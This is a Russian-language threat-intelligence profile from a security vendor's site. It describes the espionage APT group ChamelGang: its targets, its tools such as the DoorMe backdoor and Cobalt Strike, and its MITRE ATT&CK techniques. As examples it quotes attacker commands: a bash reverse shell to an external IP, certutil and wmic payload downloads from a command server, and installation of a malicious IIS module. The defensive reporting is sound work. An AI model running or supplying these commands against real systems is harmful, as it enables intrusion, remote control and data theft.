Russian
  • English
  • Korean
  • Техническая поддержка
  • Личный кабинет партнера
Positive Technologies
Russian
  • English
  • Korean
  • Решения
    Построение центра ГосСОПКА

    Комплексное решение для создания центра ГосСОПКА и взаимодействия с НКЦКИ

    Комплекс для раннего выявления сложных угроз

    Комплексное решение для раннего выявления и предотвращения целевых атак

    Безопасность объектов КИИ

    Система безопасности значимых объектов КИИ в соответствии с требованиями закона № 187-ФЗ

    PT Industrial Cybersecurity Suite

    Комплексная платформа для защиты промышленности от киберугроз

    Выполнение Указа № 250

    Выполнение требований Указа Президента РФ № 250

    Посмотреть все →
  • Продукты
    MaxPatrol 8

    Контроль защищенности и соответствия стандартам

    MaxPatrol SIEM

    Выявление инцидентов ИБ в реальном времени

    PT ISIM

    Управление инцидентами кибербезопасности АСУ ТП

    PT MultiScanner

    Многоуровневая защита от вредоносного ПО

    ПТ Ведомственный центр

    Управление инцидентами и взаимодействие с ГосСОПКА

    MaxPatrol SIEM All-in-One

    Полноценный SIEM для небольших инфраструктур

    MaxPatrol VM

    Система нового поколения для управления уязвимостями

    PT Network Attack Discovery

    Система анализа трафика (NTA) для выявления атак

    PT Application Firewall

    Защита приложений от веб-атак

    PT Application Inspector

    Анализатор защищенности приложений

    PT BlackBox

    Динамический анализатор приложений

    PT Platform 187

    Реализация основных требований 187-ФЗ для небольших инфраструктур

    XSpider

    Сканер уязвимостей

    PT Sandbox

    Первая песочница, которая защищает именно вашу инфраструктуру

    PT XDR

    Продукт класса Extended Detection and Response для выявления киберугроз и реагирования на них

    PT Threat Intelligence Feeds

    Фиды с экспертными знаниями об угрозах

    Посмотреть все →
  • Сервисы
    Непрерывный анализ защищенности бизнеса

    Услуги Positive Technologies по анализу защищенности бизнеса от киберугроз позволят непрерывно выявлять реальные векторы атак на вашу компанию и совершенствовать стратегию реагирования на инциденты

    Услуги PT Expert Security Center

    Экспертный центр безопасности Positive Technologies предоставляет услуги по обнаружению, реагированию и расследованию сложных инцидентов, а также по мониторингу защищенности корпоративных систем

    Исследование угроз и уязвимостей аппаратных решений

    Выявление аппаратных уязвимостей и закладок – один из самых сложных элементов в реализации зрелой стратегии безопасности. Эксперты Positive Technologies готовы оказать всестороннюю помощь в этом вопросе.

    Расширенная техническая поддержка

    Сделайте использование продуктов Positive Technologies еще более эффективным и приятным с расширенной технической поддержкой. Наши специалисты могут самостоятельно провести установку и настройку продуктов, оценить эффективность работы и в кратчайшие сроки разобраться с любым обращением от клиентов.

    Посмотреть все →
  • Исследования
    Аналитические статьи
    База знаний
    Словарь терминов ИБ
    Хакерские группировки
    PT ESC Threat Intelligence
    Блог
    Вебинары
    Уязвимости и угрозы
    Посмотреть все →
  • Партнеры
    Авторизованные партнеры
    Дистрибьюторы
    Технологические партнеры
    MSSP-партнеры
    Авторизованные учебные центры
    Стать партнером
    Вход в личный кабинет
    Посмотреть все →
  • О компании
    История
    Клиенты
    Долговые инструменты
    Пресс-центр
    Новости
    Мероприятия
    Вакансии
    Контакты
    Документация и материалы
    Эксперты
    Посмотреть все →
  • Инвесторам
Меню
  • Главная
  • Исследования
  • Хакерские группировки
  • ChamelGang

ChamelGang

Обнаружено ESC
Атакуемые отрасли:
  • Государственный сектор
  • Финансовый сектор
  • Энергетика
  • Авиационно-космическая промышленность
  • Телекоммуникации

Содержание

  • Общее описание
  • Инструменты
  • Атакуемые отрасли
  • Атакуемые страны
  • Отчеты Positive Technologies и других исследователей
  • Тактики из MITRE ATT&CK, использованные группой

Цели:

  • Шпионаж

Общее описание

ChamelGang - APT-группировка, активная, как минимум, с 2019 года. Особенность группы - маскировка ВПО и сетевой инфраструктуры под легитимные сервисы Microsoft, TrendMicro, McAfee, IBM, Google и других компаний. В расследуемых нами кейсах группа проникала в сеть двумя способами: trusted relationship - группа скомпрометировала дочернюю организацию и через нее проникла в сеть целевого предприятия, и компрометация Exchange сервера с помощью цепочки уязвимостей ProxyShell. Еще одна особенность группы – использование пассивновного бэкбора DoorMe, который группа встраивала как модуль в скомпрометированный Exchange или в другой IIS сервер.

Инструменты

  • DoorMe
  • ProxyT
  • BeaconLoader
  • Cobalt Strike
  • FRP
  • Tiny Shell
  • reGeorg

Атакуемые отрасли

  • Авиационно-космическая промышленность
  • Государственный сектор
  • Телекоммуникации
  • Финансовый сектор
  • Энергетика

Атакуемые страны

  • Афганистан
  • Вьетнам
  • Индия
  • Литва
  • Непал
  • Россия
  • США
  • Тайвань
  • Турция
  • Япония

Отчеты Positive Technologies и других исследователей

  • https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/new-apt-group-chamelgang/

Тактики из MITRE ATT&CK, использованные группой

ID Название Описание
Resource Development
T1583.001 Domains Группа ChamelGang приобретала домены, которые имитировали легитимные. Примеры: newtrendmicro.com, centralgoogle.com, microsoft-support.net, cdn-chrome.com, mcafee-upgrade.com, centralgoogle.com
T1587.001 Malware Группа ChamelGang разработала собственное ВПО для совершения атаки. Примеры: бэкдор DoorMe, ProxyTest
T1588.002 Tool Группа ChamelGang использовала общедоступный инструмент Cobalt Strike, для работы с которым требуется платная лицензия. Примеры: Watermark – 1936770133
T1588.004 Digital Certificates Группа ChamelGang размещала собственные SSL-сертификаты, которые имитировали легитимные. Примеры: github.com, www.ibm.com, jquery.com, update.microsoft-support.net
Initial Access
T1199 Trusted Relationship Группа ChamelGang проникла в целевую организацию через смежную инфраструктуру с дочерней организацией
T1190 Exploit Public-Facing Application Группа ChamelGang использовала общедоступный эксплойт для получения доступа к инфраструктуре, смежной с инфраструктурой атакуемой организации. Примеры: CVE-2017-12149, CVE-2021-34473, CVE-2021-34523, CVE-2021-31207
Execution
T1047 Windows Management Instrumentation Группа ChamelGang использовала утилиту wmic для выполнения команд на узлах. Примеры: C:\Windows\system32\cmd.exe /C wmic /node:"host" process call create "c:\windows\system32\cmd.exe /c certutil -urlcache -f -split http://42.99.116[.]14/ c:\windows\temp\MpKsl15169faf > c:\windows\temp\_1622775917806 2>&1"
T1059.003 Windows Command Shell Группа ChamelGang использовала командный интерпретатор «cmd.exe /c» для выполнения команд на узлах. Примеры: cmd.exe /C copy hosts.bak c:\windows\system32\drivers\etc\hosts
Persistence
T1505.003 Web Shell Группа ChamelGang использовала различные веб-шеллы, а также нативный модуль IIS-сервера для управления зараженными узлами. Примеры: c:\windows\system32\inetsrv\appcmd.exe install module /name:FastCgiModule_en64bit /image:%windir%\System32\inetsrv\iisfcgix64.dll
T1574.001 DLL Search Order Hijacking Группа ChamelGang использовала соответствующую технику для исполнения полезной нагрузки. Примеры: oci.dll, wlbsctrl.dll
Privilege Escalation
T1068 Exploitation for Privilege Escalation Группа ChamelGang использовала эксплоиты для повышения привилегий на доступных узлах. Примеры: EternalBlue
Defense Evasion
T1036.003 Masquerading: Rename System Utilities Группа ChamelGang использовала вредоносные программы, которые копируют имена системных утилит, чтобы избежать обнаружения. Примеры: avp.exe, oci.dll, wlbsctrl.dll, modrpflt.dll, protsdown.dll
T1055 Process Injection Группа ChamelGang применяла вредоносные программы, которые используют внедрение вредоносной нагрузки в системные процессы
T1070 Indicator Removal on Host Группа ChamelGang удаляла образцы ВПО, чтобы избежать обнаружения
T1078.003 Local Accounts Группа ChamelGang использовала скомпрометированные локальные аккаунты администраторов для запуска ВПО с повышенными привилегиями для продвижения по скомпрометированной сети
T1140 Deobfuscate/Decode Files or Information Основная полезная нагрузка ВПО зашифрована алгоритмом AES
T1564.001 Hide Artifacts: Hidden Files and Directories Группа ChamelGang создавала скрытые файлы в Unix-подобных системах
T1070.006 Indicator Removal on Host: Timestomp Группа ChamelGang изменяла время создания ВПО и утилит в файловой системе, указывая более ранний период
Discovery
T1012 Query Registry Группа ChamelGang использовала утилиту reg для редактирования реестра Windows. Примеры: reg query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
T1016.001 System Network Configuration Discovery: Internet Connection Discovery Группа ChamelGang использовала утилиту curl для проверки интернет-соединения и связи с управляющими серверами. Примеры: curl -I -v https://*.*.*.*
T1018 Remote System Discovery Группа ChamelGang использовала утилиты nslookup, ping для проведения сетевой разведки. Примеры: nslookup -type=ns victim.local *.*.*.*, ping -a -n 1 *.*.*.*
T1049 System Network Connections Discovery Группа ChamelGang использовала утилиту netstat для проверки сетевых соединений. Примеры: c:\\windows\\system32\\cmd.exe /c netstat -anop tcp \u003e c:\\windows\\temp\\_1622169989165
T1057 Process Discovery Группа ChamelGang использовала утилиту tasklist для получения информации о процессах
T1069.001 Local Groups Группа ChamelGang использовала утилиту net group для обнаружения пользователей
T1082 System Information Discovery Группа ChamelGang использовала утилиты ver, systeminfo для проведения разведки на узлах
T1087.001 Local Account Группа ChamelGang использовала утилиты net user, quser для обнаружения пользователей
Lateral Movement
T1210 Exploitation of Remote Services Группа ChamelGang эксплуатировала уязвимость MS17-010 (EternalBlue) для бокового перемещения на другие системы в скомпрометированной сети
Collection
T1560 Archive Collected Data Группа ChamelGang запускала консольную команду для создания архива файлов интересующих типов из пользовательских директорий на зараженных узлах. Примеры: 7z.exe a -padminadmin -mhe=on -mx9 his.7z hist*.
Command And Control
T1071 Application Layer Protocol Группа ChamelGang использовала HTTPS Cobalt Strike Beacon, а также версию с именованными каналами
T1090 Proxy Группа ChamelGang использовала прокси-серверы внутри сети. Примеры: FRP, bash -i >& /dev/tcp/115.144.122.8/5555 0>&1.
T1105 Ingress Tool Transfer Группа ChamelGang загружала дополнительные утилиты с управляющего сервера посредством утилиты certutil. Примеры: certutil -urlcache -f -split http://42.99.116[.]14/.
T1572 Protocol Tunneling Группа ChamelGang использовала инструменты туннелирования сетевого трафика. Примеры: Neo-reGeorg
Exfiltration
T1041 Exfiltration Over C2 Channel Группа ChamelGang выгружала украденные файлы на управляющие серверы

Группировки, атакующие такие же отрасли:

  • APT31
  • APT32
  • Bronze Union
  • Calypso
  • Cobalt
Поделиться:
Ссылка скопирована
Вернуться к выбору статей
Решения
  • Построение центра ГосСОПКА
  • Комплекс для раннего выявления сложных угроз
  • Безопасность объектов КИИ
  • PT Industrial Cybersecurity Suite
  • Выполнение Указа № 250
Продукты
  • MaxPatrol 8
  • MaxPatrol SIEM
  • PT ISIM
  • PT MultiScanner
  • ПТ Ведомственный центр
  • MaxPatrol SIEM All-in-One
  • MaxPatrol VM
  • PT Network Attack Discovery
  • PT Application Firewall
  • PT Application Inspector
  • PT BlackBox
  • PT Platform 187
  • XSpider
  • PT Sandbox
  • PT XDR
  • PT Threat Intelligence Feeds
Сервисы
  • Непрерывный анализ защищенности бизнеса
  • Услуги PT Expert Security Center
  • Исследование угроз и уязвимостей аппаратных решений
  • Расширенная техническая поддержка
Исследования
  • Аналитические статьи
  • База знаний
  • Словарь терминов ИБ
  • Хакерские группировки
  • PT ESC Threat Intelligence
  • Блог
  • Вебинары
  • Уязвимости и угрозы
Партнеры
  • Авторизованные партнеры
  • Дистрибьюторы
  • Технологические партнеры
  • MSSP-партнеры
  • Авторизованные учебные центры
  • Стать партнером
  • Вход в личный кабинет
О компании
  • История
  • Клиенты
  • Долговые инструменты
  • Пресс-центр
  • Новости
  • Мероприятия
  • Вакансии
  • Контакты
  • Документация и материалы
  • Эксперты
Инвесторам
Positive Technologies
© Positive Technologies, 2002—2023.
Мы в социальных сетях:
  • Сообщить об уязвимости
  • Справочный портал
  • Правила использования
  • Политика конфиденциальности
  • Политика использования файлов cookie
  • Юридическая информация
  • Информация в ленте Интерфакс
  • Карта сайта
© Positive Technologies, 2002—2023.
  • Сообщить об уязвимости
  • Справочный портал
  • Правила использования
  • Политика конфиденциальности
  • Политика использования файлов cookie
  • Юридическая информация
  • Информация в ленте Интерфакс
  • Карта сайта